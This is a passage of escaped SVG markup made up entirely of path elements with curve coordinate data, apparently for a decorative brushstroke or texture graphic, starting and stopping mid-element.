d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path 